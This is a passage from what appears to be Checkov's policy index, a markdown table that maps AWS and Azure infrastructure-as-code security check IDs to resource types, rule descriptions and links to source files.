[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1460 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1461 | CKV2_AWS_37 | resource | 
aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1462 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1463 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1464 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1465 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1466 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | +| 1467 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | 
[Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | +| 1468 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1469 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1470 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1471 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1472 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1473 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1474 | CKV2_AWS_41 
| resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | +| 1475 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | +| 1476 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | +| 1477 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1478 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1479 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1480 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder 
is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1481 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | +| 1482 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1483 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1484 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | +| 1485 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | +| 1486 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS 
ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | +| 1487 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1488 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1489 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | +| 1490 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1491 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | 
[OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | +| 1492 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | +| 1493 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | +| 1494 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | +| 1495 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1496 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1497 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1498 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1499 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1500 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1501 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | +| 1502 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | +| 1503 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | +| 1504 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1505 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1506 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | +| 1507 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | +| 1508 | CKV2_AWS_62 | resource | 
aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | +| 1509 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | +| 1510 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | +| 1511 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | +| 1512 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | +| 1513 | CKV2_AWS_67 | resource | aws_kms_key | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1514 | CKV2_AWS_67 | resource | aws_s3_bucket | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1515 | CKV2_AWS_67 | resource | 
aws_s3_bucket_server_side_encryption_configuration | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1516 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1517 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1518 | CKV2_AWS_68 | resource | aws_iam_role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1519 | CKV2_AWS_68 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1520 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1521 | 
CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1522 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1523 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1524 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 1525 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 1526 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | +| 1527 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | +| 1528 | CKV_AZURE_3 
| resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 1529 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 1530 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 1531 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 1532 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | +| 1533 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 1534 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 1535 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | 
[AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | +| 1536 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 1537 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 1538 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | +| 1539 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 1540 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 1541 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | +| 1542 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | 
[AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 1543 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 1544 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | +| 1545 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1546 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1547 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1548 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 1549 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | 
[NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1550 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1551 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1552 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1553 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1554 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 1555 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1556 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access 
